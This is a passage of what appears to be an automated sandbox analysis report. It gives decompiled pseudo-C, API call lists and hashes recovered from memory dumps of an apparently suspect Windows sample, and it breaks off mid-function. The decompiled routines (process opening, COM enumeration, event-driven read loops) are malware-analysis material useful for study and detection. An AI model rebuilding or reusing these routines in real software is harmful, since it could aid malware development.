                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,001D6187,?,?,00000000,00000000), ref: 001D575C
                • ResetEvent.KERNEL32(?), ref: 001D5761
                • GetLastError.KERNEL32 ref: 001D5779
                • GetLastError.KERNEL32(?,?,00000102,001D6187,?,?,00000000,00000000), ref: 001D5794
                  • Part of subcall function 001D8389: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,001D5741,?,?,?,?,00000102,001D6187,?,?,00000000), ref: 001D8395
                  • Part of subcall function 001D8389: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001D5741,?,?,?,?,00000102,001D6187,?), ref: 001D83F3
                  • Part of subcall function 001D8389: lstrcpy.KERNEL32(00000000,00000000), ref: 001D8403
                • SetEvent.KERNEL32(?), ref: 001D5787
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                • String ID:
                • API String ID: 1449191863-0
                • Opcode ID: bb4177970554ff3fd9e7ba02e52e890094538bb416d04a907acb5d050126a37a
                • Instruction ID: cc146ecb6116d69b949b26a40dedf41627fadbabf0aa946ff93a190c7d196b17
                • Opcode Fuzzy Hash: bb4177970554ff3fd9e7ba02e52e890094538bb416d04a907acb5d050126a37a
                • Instruction Fuzzy Hash: 86018B31101A01EEDB306B20DC84F2BBBAABF54364F600B26F551912E0D720E800DA60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __lock.LIBCMT ref: 6E280175
                  • Part of subcall function 6E281B7E: __mtinitlocknum.LIBCMT ref: 6E281B94
                  • Part of subcall function 6E281B7E: __amsg_exit.LIBCMT ref: 6E281BA0
                  • Part of subcall function 6E281B7E: RtlEnterCriticalSection.NTDLL(?), ref: 6E281BA8
                • ___sbh_find_block.LIBCMT ref: 6E280180
                • ___sbh_free_block.LIBCMT ref: 6E28018F
                • HeapFree.KERNEL32(00000000,?,6E2B1A28,0000000C,6E281B5F,00000000,6E2B1AF8,0000000C,6E281B99,?,?,?,6E287A94,00000004,6E2B1E48,0000000C), ref: 6E2801BF
                • GetLastError.KERNEL32(?,6E287A94,00000004,6E2B1E48,0000000C,6E2858CA,?,?,00000000,00000000,00000000,?,6E2832B9,00000001,00000214), ref: 6E2801D0
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                • String ID:
                • API String ID: 2714421763-0
                • Opcode ID: 43b6cb95d3a342972afe3f806825d3c765e6bb06c5465f6990c725fcb3ef5791
                • Instruction ID: 48100bff18a6f937f6a66da222a3e7c6ac3e52cedfd87f83b3d3c8026edd1db1
                • Opcode Fuzzy Hash: 43b6cb95d3a342972afe3f806825d3c765e6bb06c5465f6990c725fcb3ef5791
                • Instruction Fuzzy Hash: E1018F3581661AABEB205BF19808F8F377AAF01766F240908E855661C0EB34958CCA65
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E001D14CE(intOrPtr _a4) {
                				void* _t2;
                				unsigned int _t4;
                				void* _t5;
                				long _t6;
                				void* _t7;
                				void* _t15;
                
                				_t2 = CreateEventA(0, 1, 0, 0);
                				 *0x1dd26c = _t2;
                				if(_t2 == 0) {
                					return GetLastError();
                				}
                				_t4 = GetVersion();
                				if(_t4 != 5) {
                					L4:
                					if(_t15 <= 0) {
                						_t5 = 0x32;
                						return _t5;
                					}
                					L5:
                					 *0x1dd25c = _t4;
                					_t6 = GetCurrentProcessId();
                					 *0x1dd258 = _t6;
                					 *0x1dd264 = _a4;
                					_t7 = OpenProcess(0x10047a, 0, _t6);
                					 *0x1dd254 = _t7;
                					if(_t7 == 0) {
                						 *0x1dd254 =  *0x1dd254 | 0xffffffff;
                					}
                					return 0;
                				}
                				if(_t4 >> 8 > 0) {
                					goto L5;
                				}
                				_t15 = _t4 - _t4;
                				goto L4;
                			}










                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001D5274,?,?,00000001,?,?,?,001D647E,?), ref: 001D14D6
                • GetVersion.KERNEL32(?,00000001,?,?,?,001D647E,?), ref: 001D14E5
                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,001D647E,?), ref: 001D1501
                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,001D647E,?), ref: 001D151E
                • GetLastError.KERNEL32(?,00000001,?,?,?,001D647E,?), ref: 001D153D
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                • String ID:
                • API String ID: 2270775618-0
                • Opcode ID: c0fc077cd6c45d6707033d5f270d7877d58f1df05a5aa513563eb6e39557dc80
                • Instruction ID: 4f32930625e9b633bef84d4a3628bde9f3df48e426c8d5cf0db6866db7559bbd
                • Opcode Fuzzy Hash: c0fc077cd6c45d6707033d5f270d7877d58f1df05a5aa513563eb6e39557dc80
                • Instruction Fuzzy Hash: 93F08C74647302FBDB249B24BC19B143B61A781741F50491BF543C76E0D774D482CB14
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: _realloc
                • String ID:
                • API String ID: 1750794848-0
                • Opcode ID: 788af7bb6f71f44278ef0184b89523640159d0c4a9c8655d359240f93e97bc90
                • Instruction ID: 19f2b1a2b5698bc030be2fc73ed7dce36b8fc381ca51285812ab337135a87560
                • Opcode Fuzzy Hash: 788af7bb6f71f44278ef0184b89523640159d0c4a9c8655d359240f93e97bc90
                • Instruction Fuzzy Hash: FCB1D4B46147099FD724CFA9C880A9ABBF2FF4A314F444A2DD48987751D730E949CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: _realloc
                • String ID:
                • API String ID: 1750794848-0
                • Opcode ID: 3b0be5b34c3f7846ca78056c90f01374ff4e9c645da4d9f8a9b9701259980688
                • Instruction ID: eea659fa5252c56da36562e97aeb9adf6a4a0343bf46934ec0db13067a55d300
                • Opcode Fuzzy Hash: 3b0be5b34c3f7846ca78056c90f01374ff4e9c645da4d9f8a9b9701259980688
                • Instruction Fuzzy Hash: 857105B5A14B058FD760CF69C480A56FBF6FF49310B508A2ED48A8BA51E770F946CF90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 46%
                			E001D5E3C(intOrPtr* __eax) {
                				void* _v8;
                				WCHAR* _v12;
                				void* _v16;
                				char _v20;
                				void* _v24;
                				intOrPtr _v28;
                				void* _v32;
                				intOrPtr _v40;
                				short _v48;
                				intOrPtr _v56;
                				short _v64;
                				intOrPtr* _t54;
                				intOrPtr* _t56;
                				intOrPtr _t57;
                				intOrPtr* _t58;
                				intOrPtr* _t60;
                				void* _t61;
                				intOrPtr* _t63;
                				intOrPtr* _t65;
                				short _t67;
                				intOrPtr* _t68;
                				intOrPtr* _t70;
                				intOrPtr* _t72;
                				intOrPtr* _t75;
                				intOrPtr* _t77;
                				intOrPtr _t79;
                				intOrPtr* _t83;
                				intOrPtr* _t87;
                				intOrPtr _t103;
                				intOrPtr _t109;
                				void* _t118;
                				void* _t122;
                				void* _t123;
                				intOrPtr _t130;
                
                				_t123 = _t122 - 0x3c;
                				_push( &_v8);
                				_push(__eax);
                				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                				if(_t118 >= 0) {
                					_t54 = _v8;
                					_t103 =  *0x1dd2a4; // 0x2dca5a8
                					_t5 = _t103 + 0x1de038; // 0x3050f485
                					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                					_t56 = _v8;
                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                					if(_t118 >= 0) {
                						__imp__#2(0x1dc2b0);
                						_v28 = _t57;
                						if(_t57 == 0) {
                							_t118 = 0x8007000e;
                						} else {
                							_t60 = _v32;
                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                							_t87 = __imp__#6;
                							_t118 = _t61;
                							if(_t118 >= 0) {
                								_t63 = _v24;
                								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                								if(_t118 >= 0) {
                									_t130 = _v20;
                									if(_t130 != 0) {
                										_t67 = 3;
                										_v64 = _t67;
                										_v48 = _t67;
                										_v56 = 0;
                										_v40 = 0;
                										if(_t130 > 0) {
                											while(1) {
                												_t68 = _v24;
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												_t123 = _t123;
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												asm("movsd");
                												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                												if(_t118 < 0) {
                													goto L16;
                												}
                												_t70 = _v8;
                												_t109 =  *0x1dd2a4; // 0x2dca5a8
                												_t28 = _t109 + 0x1de0bc; // 0x3050f1ff
                												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                												if(_t118 >= 0) {
                													_t75 = _v16;
                													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                													if(_t118 >= 0 && _v12 != 0) {
                														_t79 =  *0x1dd2a4; // 0x2dca5a8
                														_t33 = _t79 + 0x1de078; // 0x76006f
                														if(lstrcmpW(_v12, _t33) == 0) {
                															_t83 = _v16;
                															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                														}
                														 *_t87(_v12);
                													}
                													_t77 = _v16;
                													 *((intOrPtr*)( *_t77 + 8))(_t77);
                												}
                												_t72 = _v8;
                												 *((intOrPtr*)( *_t72 + 8))(_t72);
                												_v40 = _v40 + 1;
                												if(_v40 < _v20) {
                													continue;
                												}
                												goto L16;
                											}
                										}
                									}
                								}
                								L16:
                								_t65 = _v24;
                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                							}
                							 *_t87(_v28);
                						}
                						_t58 = _v32;
                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                					}
                				}
                				return _t118;
                 			}

                APIs
                • SysAllocString.OLEAUT32(001DC2B0), ref: 001D5E8C
                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 001D5F6D
                • SysFreeString.OLEAUT32(00000000), ref: 001D5F86
                • SysFreeString.OLEAUT32(?), ref: 001D5FB5
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: String$Free$Alloclstrcmp
                • String ID:
                • API String ID: 1885612795-0
                • Opcode ID: 6e1a77d133a713fbe43b0e0a3e8b13fdbaf04d923e7626e3660dda69d3e77d67
                • Instruction ID: 2bef711535d478058dd313f7902edff8f8569d59e62218d6c8ec92302f8fcb94
                • Opcode Fuzzy Hash: 6e1a77d133a713fbe43b0e0a3e8b13fdbaf04d923e7626e3660dda69d3e77d67
                • Instruction Fuzzy Hash: 53514C75D0051AEFCB00DFA8C8889AEB7BAEF88705B14499AF915EF350D7319D41CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(?), ref: 001D5384
                • SysFreeString.OLEAUT32(00000000), ref: 001D5469
                  • Part of subcall function 001D5E3C: SysAllocString.OLEAUT32(001DC2B0), ref: 001D5E8C
                • SafeArrayDestroy.OLEAUT32(00000000), ref: 001D54BC
                • SysFreeString.OLEAUT32(00000000), ref: 001D54CB
                  • Part of subcall function 001D6872: Sleep.KERNEL32(000001F4), ref: 001D68BA
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: String$AllocFree$ArrayDestroySafeSleep
                • String ID:
                • API String ID: 3193056040-0
                • Opcode ID: a2a3f9b2b2dc0a2d6ea844ffb3a1547c0c4ddaa09ec130f2ccc6b6564986ec3b
                • Instruction ID: a0cd87edd3fa046f2b4e5df6b36043eae669ea9323ebb347acd501eac751d78d
                • Opcode Fuzzy Hash: a2a3f9b2b2dc0a2d6ea844ffb3a1547c0c4ddaa09ec130f2ccc6b6564986ec3b
                • Instruction Fuzzy Hash: A7514035500A09EFDB01DFA8C844A9EB7BAFF88751F14842AE905DB320EB75DD85CB51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E001D8D85(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				void _v92;
                				void _v236;
                				void* _t55;
                				unsigned int _t56;
                				signed int _t66;
                				signed int _t74;
                				void* _t76;
                				signed int _t79;
                				void* _t81;
                				void* _t92;
                				void* _t96;
                				signed int* _t99;
                				signed int _t101;
                				signed int _t103;
                				void* _t107;
                
                				_t92 = _a12;
                				_t101 = __eax;
                				_t55 = E001D8483(_a16, _t92);
                				_t79 = _t55;
                				if(_t79 == 0) {
                					L18:
                					return _t55;
                				}
                				_t56 =  *(_t92 + _t79 * 4 - 4);
                				_t81 = 0;
                				_t96 = 0x20;
                				if(_t56 == 0) {
                					L4:
                					_t97 = _t96 - _t81;
                					_v12 = _t96 - _t81;
                					E001DA60F(_t79,  &_v236);
                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E001D2215(_t101,  &_v236, _a8, _t96 - _t81);
                					E001D2215(_t79,  &_v92, _a12, _t97);
                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                					_t66 = E001DA60F(_t101, 0x1dd1b0);
                					_t103 = _t101 - _t79;
                					_a8 = _t103;
                					if(_t103 < 0) {
                						L17:
                						E001DA60F(_a16, _a4);
                						E001DA624(_t79,  &_v236, _a4, _t97);
                						memset( &_v236, 0, 0x8c);
                						_t55 = memset( &_v92, 0, 0x44);
                						goto L18;
                					}
                					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                					do {
                						if(_v8 != 0xffffffff) {
                							_push(1);
                							_push(0);
                							_push(0);
                							_push( *_t99);
                							L001DB078();
                							_t74 = _t66 +  *(_t99 - 4);
                							asm("adc edx, esi");
                							_push(0);
                							_push(_v8 + 1);
                							_push(_t92);
                							_push(_t74);
                							L001DB072();
                							if(_t92 > 0 || _t74 > 0xffffffff) {
                								_t74 = _t74 | 0xffffffff;
                								_v16 = _v16 & 0x00000000;
                							}
                						} else {
                							_t74 =  *_t99;
                						}
                						_t106 = _t107 + _a8 * 4 - 0xe8;
                						_a12 = _t74;
                						_t76 = E001D4607(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                						while(1) {
                							 *_t99 =  *_t99 - _t76;
                							if( *_t99 != 0) {
                								goto L14;
                							}
                							L13:
                							_t92 =  &_v92;
                							if(E001D5151(_t79, _t92, _t106) < 0) {
                								break;
                							}
                							L14:
                							_a12 = _a12 + 1;
                							_t76 = E001D6911(_t79,  &_v92, _t106, _t106);
                							 *_t99 =  *_t99 - _t76;
                							if( *_t99 != 0) {
                								goto L14;
                							}
                							goto L13;
                						}
                						_a8 = _a8 - 1;
                						_t66 = _a12;
                						_t99 = _t99 - 4;
                						 *(0x1dd1b0 + _a8 * 4) = _t66;
                					} while (_a8 >= 0);
                					_t97 = _v12;
                					goto L17;
                				}
                				while(_t81 < _t96) {
                					_t81 = _t81 + 1;
                					_t56 = _t56 >> 1;
                					if(_t56 != 0) {
                						continue;
                					}
                					goto L4;
                				}
                				goto L4;
                 			}

                APIs
                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 001D8E32
                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 001D8E48
                • memset.NTDLL ref: 001D8EE8
                • memset.NTDLL ref: 001D8EF8
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: memset$_allmul_aulldiv
                • String ID:
                • API String ID: 3041852380-0
                • Opcode ID: cd1d83a163552ba2e5caa388221e56358e764419aade89ea876987b4f8cfa0cb
                • Instruction ID: d322d1604aaa9150729d85758d9d4e4286d571d746191b7ca97b02745fc0b4c3
                • Opcode Fuzzy Hash: cd1d83a163552ba2e5caa388221e56358e764419aade89ea876987b4f8cfa0cb
                • Instruction Fuzzy Hash: 05419131A00259ABDF10DFA8DC81BEE7775EF55710F10852AF91AA7381EB70AE54CB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 001DA973
                  • Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C
                • ResetEvent.KERNEL32(?), ref: 001DA9E7
                • GetLastError.KERNEL32 ref: 001DAA0A
                • GetLastError.KERNEL32 ref: 001DAAB5
                  • Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                • String ID:
                • API String ID: 943265810-0
                • Opcode ID: 89a975f25b5d1c000e7193cf3d45678d04999f4ba31f338ac8f144e51f9851ab
                • Instruction ID: c19a3ff1cac272f9265d21576a955e9bff805a6d71fa75d9882093f708ad5506
                • Opcode Fuzzy Hash: 89a975f25b5d1c000e7193cf3d45678d04999f4ba31f338ac8f144e51f9851ab
                • Instruction Fuzzy Hash: 5A418C71501205BFDB31DFA1DD88E6B7BBDEF98700B104A2AF543D26A0E731A984CB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 42%
                			E001D12F8(void* __eax, void* __ecx) {
                				char _v8;
                				void* _v12;
                				intOrPtr _v16;
                				char _v20;
                				void* __esi;
                				void* _t30;
                				intOrPtr _t38;
                				intOrPtr* _t39;
                				intOrPtr* _t41;
                				void* _t54;
                				long _t64;
                				void* _t67;
                				void* _t69;
                
                				_t58 = __ecx;
                				_t67 = __eax;
                				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                					L2:
                					_t30 = _t67;
                					_pop(_t68);
                					_t69 = _t30;
                					_t64 = 0;
                					ResetEvent( *(_t69 + 0x1c));
                					_push( &_v8);
                					_push(4);
                					_push( &_v20);
                					_push( *((intOrPtr*)(_t69 + 0x18)));
                					if( *0x1dd138() != 0) {
                						L9:
                						if(_v8 == 0) {
                							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                						} else {
                							 *0x1dd168(0, 1,  &_v12);
                							if(0 != 0) {
                								_t64 = 8;
                							} else {
                								_t38 = E001D7E20(0x1000);
                								_v16 = _t38;
                								if(_t38 == 0) {
                									_t64 = 8;
                								} else {
                									_push(0);
                									_push(_v8);
                									_push( &_v20);
                									while(1) {
                										_t41 = _v12;
                										_t61 =  *_t41;
                										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                										ResetEvent( *(_t69 + 0x1c));
                										_push( &_v8);
                										_push(0x1000);
                										_push(_v16);
                										_push( *((intOrPtr*)(_t69 + 0x18)));
                										if( *0x1dd138() != 0) {
                											goto L17;
                										}
                										_t64 = GetLastError();
                										if(_t64 == 0x3e5) {
                											_t64 = E001D66BA( *(_t69 + 0x1c), _t61, 0xffffffff);
                											if(_t64 == 0) {
                												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                												if(_t64 == 0) {
                													goto L17;
                												}
                											}
                										}
                										L19:
                										E001DA5FA(_v16);
                										if(_t64 == 0) {
                											_t64 = E001D49F6(_v12, _t69);
                										}
                										goto L22;
                										L17:
                										_t64 = 0;
                										if(_v8 != 0) {
                											_push(0);
                											_push(_v8);
                											_push(_v16);
                											continue;
                										}
                										goto L19;
                									}
                								}
                								L22:
                								_t39 = _v12;
                								 *((intOrPtr*)( *_t39 + 8))(_t39);
                							}
                						}
                					} else {
                						_t64 = GetLastError();
                						if(_t64 != 0x3e5) {
                							L8:
                							if(_t64 == 0) {
                								goto L9;
                							}
                						} else {
                							_t64 = E001D66BA( *(_t69 + 0x1c), _t58, 0xffffffff);
                							if(_t64 == 0) {
                								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                								goto L8;
                							}
                						}
                					}
                					return _t64;
                				} else {
                					_t54 = E001D5053(__ecx, __eax);
                					if(_t54 != 0) {
                						return _t54;
                					} else {
                						goto L2;
                					}
                				}
                 			}

                APIs
                • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 001D1957
                • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 001D1970
                • ResetEvent.KERNEL32(?), ref: 001D19E9
                • GetLastError.KERNEL32 ref: 001D1A04
                  • Part of subcall function 001D5053: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 001D506A
                  • Part of subcall function 001D5053: SetEvent.KERNEL32(?), ref: 001D507A
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Event$ErrorLastReset$ObjectSingleWait
                • String ID:
                • API String ID: 1123145548-0
                • Opcode ID: 45c9108e4ac3076f85b3aee1ffed95ae22f52bc6ef1e69dad0fe6076ab48d2d0
                • Instruction ID: e230af4ad366340d306c0ea9ee9a33e9752a046265dce303355e90b52505f9d0
                • Opcode Fuzzy Hash: 45c9108e4ac3076f85b3aee1ffed95ae22f52bc6ef1e69dad0fe6076ab48d2d0
                • Instruction Fuzzy Hash: F041D232601600BFCB219BA4CC40AAEB7BAEF94364F154926F11193290EB70ED42DB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E001D8C8E(signed int _a4, signed int* _a8) {
                				void* __ecx;
                				void* __edi;
                				signed int _t6;
                				intOrPtr _t8;
                				intOrPtr _t12;
                				short* _t19;
                				void* _t25;
                				signed int* _t28;
                				CHAR* _t30;
                				long _t31;
                				intOrPtr* _t32;
                
                				_t6 =  *0x1dd270; // 0xd448b889
                				_t32 = _a4;
                				_a4 = _t6 ^ 0x109a6410;
                				_t8 =  *0x1dd2a4; // 0x2dca5a8
                				_t3 = _t8 + 0x1de862; // 0x61636f4c
                				_t25 = 0;
                				_t30 = E001D64A0(_t3, 1);
                				if(_t30 != 0) {
                					_t25 = CreateEventA(0x1dd2a8, 1, 0, _t30);
                					E001DA5FA(_t30);
                				}
                				_t12 =  *0x1dd25c; // 0x2000000a
                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E001D7F56() != 0) {
                					L12:
                					_t28 = _a8;
                					if(_t28 != 0) {
                						 *_t28 =  *_t28 | 0x00000001;
                					}
                					_t31 = E001D4EEC(_t32, 0);
                					if(_t31 == 0 && _t25 != 0) {
                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                					}
                					if(_t28 != 0 && _t31 != 0) {
                						 *_t28 =  *_t28 & 0xfffffffe;
                					}
                					goto L20;
                				} else {
                					_t19 =  *0x1dd110( *_t32, 0x20);
                					if(_t19 != 0) {
                						 *_t19 = 0;
                						_t19 = _t19 + 2;
                					}
                					_t31 = E001D4359(0,  *_t32, _t19, 0);
                					if(_t31 == 0) {
                						if(_t25 == 0) {
                							L22:
                							return _t31;
                						}
                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                						if(_t31 == 0) {
                							L20:
                							if(_t25 != 0) {
                								CloseHandle(_t25);
                							}
                							goto L22;
                						}
                					}
                					goto L12;
                				}
                 			}

                APIs
                  • Part of subcall function 001D64A0: lstrlen.KERNEL32(001D5D90,00000000,00000000,00000027,00000005,00000000,00000000,001D41C3,74666F53,00000000,001D5D90,001DD00C,?,001D5D90), ref: 001D64D6
                  • Part of subcall function 001D64A0: lstrcpy.KERNEL32(00000000,00000000), ref: 001D64FA
                  • Part of subcall function 001D64A0: lstrcat.KERNEL32(00000000,00000000), ref: 001D6502
                • CreateEventA.KERNEL32(001DD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,001D86E3,?,00000001,?), ref: 001D8CCF
                  • Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606
                • WaitForSingleObject.KERNEL32(00000000,00004E20,001D86E3,00000000,00000000,?,00000000,?,001D86E3,?,00000001,?,?,?,?,001D858E), ref: 001D8D2F
                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,001D86E3,?,00000001,?), ref: 001D8D5D
                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,001D86E3,?,00000001,?,?,?,?,001D858E), ref: 001D8D75
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 73268831-0
                • Opcode ID: 880686b31428c9c02e4d57e2bcce2fbf9798151f42e644864b678e610cfae125
                • Instruction ID: 0459c6f1f5b2bcaf1349cb219f87af2d437c654eae2f5cc5c5a743f2426b4f37
                • Opcode Fuzzy Hash: 880686b31428c9c02e4d57e2bcce2fbf9798151f42e644864b678e610cfae125
                • Instruction Fuzzy Hash: 8D21FC32502B51ABCB316BEC9C84A6B739AFFA4B51B160A17F956D73D0DF30CC418690
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 38%
                			E001D5053(void* __ecx, void* __esi) {
                				char _v8;
                				long _v12;
                				char _v16;
                				long _v20;
                				long _t34;
                				long _t39;
                				long _t42;
                				long _t56;
                				intOrPtr _t58;
                				void* _t59;
                				intOrPtr* _t60;
                				void* _t61;
                
                				_t61 = __esi;
                				_t59 = __ecx;
                				_t60 =  *0x1dd140; // 0x1dad31
                				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                				do {
                					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                					_v20 = _t34;
                					if(_t34 != 0) {
                						L3:
                						_push( &_v16);
                						_push( &_v8);
                						_push(_t61 + 0x2c);
                						_push(0x20000013);
                						_push( *((intOrPtr*)(_t61 + 0x18)));
                						_v8 = 4;
                						_v16 = 0;
                						if( *_t60() == 0) {
                							_t39 = GetLastError();
                							_v12 = _t39;
                							if(_v20 == 0 || _t39 != 0x2ef3) {
                								L15:
                								return _v12;
                							} else {
                								goto L11;
                							}
                						}
                						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                							goto L11;
                						} else {
                							_v16 = 0;
                							_v8 = 0;
